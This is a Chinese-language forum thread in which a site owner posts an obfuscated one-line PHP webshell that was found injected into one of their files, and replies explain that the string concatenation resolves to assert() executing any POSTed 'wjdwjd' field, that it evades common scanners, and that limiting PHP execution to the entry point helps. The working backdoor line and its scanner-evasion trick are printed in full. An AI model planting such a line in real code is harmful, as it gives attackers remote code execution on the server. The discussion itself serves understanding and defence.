给大家看看一个一句话木马 请教一下原理

tiane12

一个PHP文件里，被加了下面这一句

[ol]

@$A='Acc';$p='_';$o='PO';$s='S';$t='T';$a='as';$b='sert';$Acc=$a.$b;@${$A}(${$p.$o.$s.$t}[wjdwjd]);[/ol]复制代码

基本能确定这是个一句话木马，但是怎么也没想明白它是怎么运行起来的，PHP里有Acc()这个函数吗？？？试过市面上大部分webshell扫描工具，都不报警，后来被我一点点找出来的。

tiane12

我好像想明白了，$A = Acc,$Acc = 'as'.'sert' = assert(_POST[wjdwjd])………………
没想到这种的居然是免杀的，太恐怖了。

风铃

assert，就这一句代码你都看不懂吗。。。。。

vpshost

不懂PHP，但隐约看到了Acc, POST, assert这几个词，其中assert

sskdgu

assert了解一下

流星

assert($_POST[wjdwjd]); 各种处理，呵呵，要是他混淆弄得更长更长，就难搞了。

lefan

本帖最后由 lefan 于 2018-7-18 09:28 编辑

之前也遭遇了webshell，有个中国菜刀不要太流弊啊，一行代码、免杀，改权限，上传文件，改文件修改时间。

自己写的程序一般不会有什么问题，被攻击的大多数是开源的cms之类，不过这些程序基本都是都是单入口，除了入口，其他文件夹都不给PHP执行权限，上传了木马也没辙assert是断言，基本所有编程语言都有。如果 assertion 是字符串，它将会被 assert() 当做 PHP 代码来执行。后面那个就是指执行任意post方法过来的wjdwjd字段内容了。

546288218

前面的一大堆就是简单的拼接了一下变量。就像古董bat防杀一样，混淆一下试听。